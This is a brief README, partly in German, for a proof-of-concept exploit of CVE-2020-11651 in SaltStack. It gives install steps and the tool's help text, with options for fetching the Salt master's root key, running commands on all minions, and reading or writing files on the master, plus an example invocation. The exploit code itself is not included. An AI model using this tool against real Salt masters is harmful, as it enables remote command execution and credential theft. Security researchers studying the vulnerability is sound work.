
PoC for CVE-2020-11651
PoC für CVE-2020-11651
Erfordert Python3, getestet auf 3.8
python3.8 -m pip install pyzmq msgpack
⇒ python3.8 poc.py -h
usage: poc.py [-h] [-p PORT] [-c CMD] [-k] [-m] [-r READ] [-w WRITE] [-f FILE] server [server ...]
Exploit CVE-2020-11651
positional arguments:
server Ziel-Server-IP oder Host
optional arguments:
-h, --help zeige diese Hilfemeldung und beende
-p PORT, --port PORT Ziel-Port (Standard=4506)
-c CMD, --cmd CMD Auszuführender Befehl
-k, --key Root-Key abrufen
-m, --minions Befehl auf allen aktiven Minions ausführen
-r READ, --read READ Eine Datei vom Salt Master lesen
-w WRITE, --write WRITE
Eine Datei auf den Salt Master schreiben
-f FILE, --file FILE Verwendet mit --write, lokale Datei zum Schreiben auf den Salt Master
Beispiel: poc.py -k 127.0.0.1 (Root-Key lesen)